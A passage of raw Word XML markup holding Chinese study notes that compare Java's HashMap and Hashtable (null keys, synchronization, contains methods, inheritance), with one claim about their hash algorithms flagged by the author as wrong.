      <w:r w:rsidR="00935833" w:rsidRPr="00F41A4C">
        <w:t>HashTable</w:t>
      </w:r>
      <w:r w:rsidR="00935833" w:rsidRPr="00F41A4C">
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44C78" w:rsidRPr="00F41A4C" w:rsidRDefault="00B44C78" w:rsidP="00B44C78">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的轻量级实现（非线程安全的实现），他们都完成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接口，主要区别在于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>允许空（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）键值（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>由于非线程安全，在只有一个线程访问的情况下，效率要高于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>允许将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>作为一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不允许。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方法去掉了，改成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>containsvalue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>containsKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方法容易让人引起误解。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>继承自</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>类，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Java1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>引进的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的一个实现。最大的不同是，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的方法是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Synchronize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不是，在多个线程访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>时，不需要自己为它的方法实现同步，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>就必须为之提供外同步。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>采用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hash/rehash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44E9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>算法都大概一样</w:t>
      </w:r>
      <w:r w:rsidR="00F44E9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F44E9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidR="00AC2FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>！！！</w:t>
      </w:r>
      <w:r w:rsidR="00F44E9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，所以性能不会有很大的差异。就</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashTable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>主要从三方面来说。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44C78" w:rsidRPr="00F41A4C" w:rsidRDefault="00B44C78" w:rsidP="00B44C78">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>历史原因</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是基于陈旧的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>类的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
